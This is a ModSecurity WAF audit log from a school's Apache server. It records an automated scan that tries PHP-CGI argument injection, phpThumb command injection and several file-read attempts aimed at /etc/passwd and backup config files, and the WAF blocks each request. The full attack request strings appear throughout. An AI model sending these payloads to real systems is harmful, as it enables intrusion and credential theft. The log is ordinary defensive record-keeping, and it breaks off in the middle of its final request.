Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4466d710-Z-- --9a2d4546-A-- [01/May/2025:10:34:00 +0700] aBLrqCgtr0Qsi1mFAsMNfAAAAJI 103.236.140.4 44906 103.236.140.4 8181 --9a2d4546-B-- GET /config.inc.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9a2d4546-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a2d4546-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070440780246 2583 (- - -) Stopwatch2: 1746070440780246 2583; combined=934, p1=417, p2=490, p3=0, p4=0, p5=27, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a2d4546-Z-- --e9d3b573-A-- [01/May/2025:10:34:05 +0700] aBLrrY144kZ4LAGlEgz3vwAAAMQ 103.236.140.4 45108 103.236.140.4 8181 --e9d3b573-B-- GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Content-Length: 42 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --e9d3b573-C-- --e9d3b573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9d3b573-E-- --e9d3b573-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||smkn22-jkt.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070445161526 3124 (- - -) Stopwatch2: 1746070445161526 3124; combined=1748, p1=425, p2=1295, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9d3b573-Z-- --53e93c50-A-- [01/May/2025:10:34:07 +0700] aBLrr4144kZ4LAGlEgz30wAAANE 103.236.140.4 45228 103.236.140.4 8181 --53e93c50-B-- GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --53e93c50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53e93c50-E-- --53e93c50-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070447691176 2299 (- - -) Stopwatch2: 1746070447691176 2299; combined=631, p1=446, p2=154, p3=0, p4=0, p5=30, sr=67, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53e93c50-Z-- --d9aea265-A-- [01/May/2025:10:34:12 +0700] aBLrtI144kZ4LAGlEgz34QAAANE 103.236.140.4 45452 103.236.140.4 8181 --d9aea265-B-- GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --d9aea265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9aea265-E-- --d9aea265-H-- Message: Access denied with code 
403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070452382506 2250 (- - -) Stopwatch2: 1746070452382506 2250; combined=655, p1=425, p2=202, p3=0, p4=0, p5=28, sr=60, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9aea265-Z-- --4c778041-A-- [01/May/2025:10:34:14 +0700] aBLrtsVMAgMJpNzaVtKwngAAAEQ 103.236.140.4 45560 103.236.140.4 8181 --4c778041-B-- GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4c778041-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c778041-E-- --4c778041-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070454614218 2331 (- - -) Stopwatch2: 1746070454614218 2331; combined=892, p1=553, p2=294, p3=0, p4=0, p5=45, sr=142, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c778041-Z-- --0e8cb97d-A-- [01/May/2025:10:34:16 +0700] aBLruOVeTgVPHjrSAYAT2gAAABI 103.236.140.4 45638 103.236.140.4 8181 --0e8cb97d-B-- GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --0e8cb97d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e8cb97d-E-- --0e8cb97d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070456265527 2016 (- - -) Stopwatch2: 1746070456265527 2016; combined=753, p1=421, p2=280, p3=0, p4=0, p5=52, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e8cb97d-Z-- --a213246c-A-- [01/May/2025:10:34:21 +0700] aBLrvcVMAgMJpNzaVtKwtgAAAFI 103.236.140.4 45870 103.236.140.4 8181 --a213246c-B-- GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a213246c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a213246c-E-- --a213246c-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070461366722 2232 (- - -) Stopwatch2: 1746070461366722 2232; combined=699, p1=475, p2=192, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a213246c-Z-- --cf1cca03-A-- [01/May/2025:10:34:21 +0700] aBLrveVeTgVPHjrSAYAT7AAAAAs 103.236.140.4 45884 103.236.140.4 8181 --cf1cca03-B-- GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --cf1cca03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf1cca03-E-- --cf1cca03-H-- 
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070461568573 2390 (- - -) Stopwatch2: 1746070461568573 2390; combined=641, p1=453, p2=155, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf1cca03-Z-- --7056942e-A-- [01/May/2025:10:34:21 +0700] aBLrvSgtr0Qsi1mFAsMNtgAAAJE 103.236.140.4 45898 103.236.140.4 8181 --7056942e-B-- GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7056942e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 
--7056942e-E-- --7056942e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070461770381 1735 (- - -) Stopwatch2: 1746070461770381 1735; combined=582, p1=443, p2=116, p3=0, p4=0, p5=23, sr=110, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7056942e-Z-- --2bf2d741-A-- [01/May/2025:10:34:21 +0700] aBLrveVeTgVPHjrSAYAT8AAAAAo 103.236.140.4 45904 103.236.140.4 8181 --2bf2d741-B-- GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2bf2d741-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bf2d741-E-- --2bf2d741-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070461971807 2014 (- - -) Stopwatch2: 1746070461971807 2014; combined=540, p1=338, p2=173, p3=0, p4=0, p5=29, sr=56, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bf2d741-Z-- --7fc93e62-A-- [01/May/2025:10:34:22 +0700] aBLrvuVeTgVPHjrSAYAT8gAAAAc 103.236.140.4 45914 103.236.140.4 8181 --7fc93e62-B-- GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7fc93e62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fc93e62-E-- --7fc93e62-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070462173298 1947 (- - -) Stopwatch2: 1746070462173298 1947; combined=469, p1=332, p2=110, p3=0, p4=0, p5=27, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fc93e62-Z-- --5ca2da45-A-- [01/May/2025:10:34:22 +0700] aBLrvigtr0Qsi1mFAsMNuAAAAJc 103.236.140.4 45924 103.236.140.4 8181 --5ca2da45-B-- GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --5ca2da45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ca2da45-E-- --5ca2da45-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070462374776 1740 (- - -) Stopwatch2: 1746070462374776 1740; combined=437, p1=308, p2=102, p3=0, p4=0, p5=26, sr=47, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ca2da45-Z-- --9f84ba28-A-- [01/May/2025:10:34:22 +0700] aBLrvo144kZ4LAGlEgz3-wAAANg 103.236.140.4 45942 103.236.140.4 8181 --9f84ba28-B-- GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9f84ba28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f84ba28-E-- --9f84ba28-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070462575920 1848 (- - -) Stopwatch2: 1746070462575920 1848; combined=638, p1=468, p2=144, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f84ba28-Z-- --1dd12c18-A-- [01/May/2025:12:19:35 +0700] aBMEZygtr0Qsi1mFAsMwjQAAAJc 103.236.140.4 59972 103.236.140.4 8181 --1dd12c18-B-- GET /wp-config.php~ HTTP/1.0 Host: 